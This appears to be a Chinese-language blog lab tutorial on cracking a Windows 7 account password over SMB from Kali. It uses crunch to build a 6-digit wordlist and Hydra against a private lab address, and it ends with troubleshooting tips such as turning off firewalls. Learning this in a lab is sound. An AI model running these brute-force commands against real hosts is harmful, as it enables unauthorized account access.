准备环境

一如既往的要求:

  • 准备Kali系统
  • 准备Win7系统
  • Kali和Win7之间能够ping通

实验目的

通过破解SMB端口获取Win7密码

实验开始

这回比上次简单了哈
打开Kali 进入 Hydra
首先创建字典,这里就不详细解释指令的意思了,可以参考上一篇 《Hydra破解SSH端口》
输入:

crunch 6 6 012345    //这一条可以省略,直接下下面这条
crunch 6 6 012345 -o pass.txt
...
hydra -l hp -P pass.txt  -vV smb://192.168.139.134
// Win7的用户名可能跟Win10的不一样,根据实际情况来填写

打完这些就ok啦
Hydra破解SMB端口

常见问题

为什么不做复杂密码的破解

简单的纯数字6位密码就有46656种组合方式,326592字节
8位的大小写字母+数字这种组合型密码,生成的文本大概是1787TB
简单一点的组合型密码也可以尝试,只需要修改crunch的指令,可以自定义设置,具体的指令百度

执行破解代码没反应

Hydra破解SMB端口


像这种情况就是 解析不到IP地址
一般的情况就是两台主机之间不能互相ping通 记住是互相 光以方ping通是不行的
还有就是防火墙没关,因为今天换了一个系统做实验 记得关双方的防火墙

破解过程中正确密码已经过了,程序却还在运行

这种情况可能是你的字典设置的有问题,匹配不上密码,检查一下字典的范围
还有一种情况就是被破解的主机没有设置密码

有任何问题可以私信或评论,一起探讨。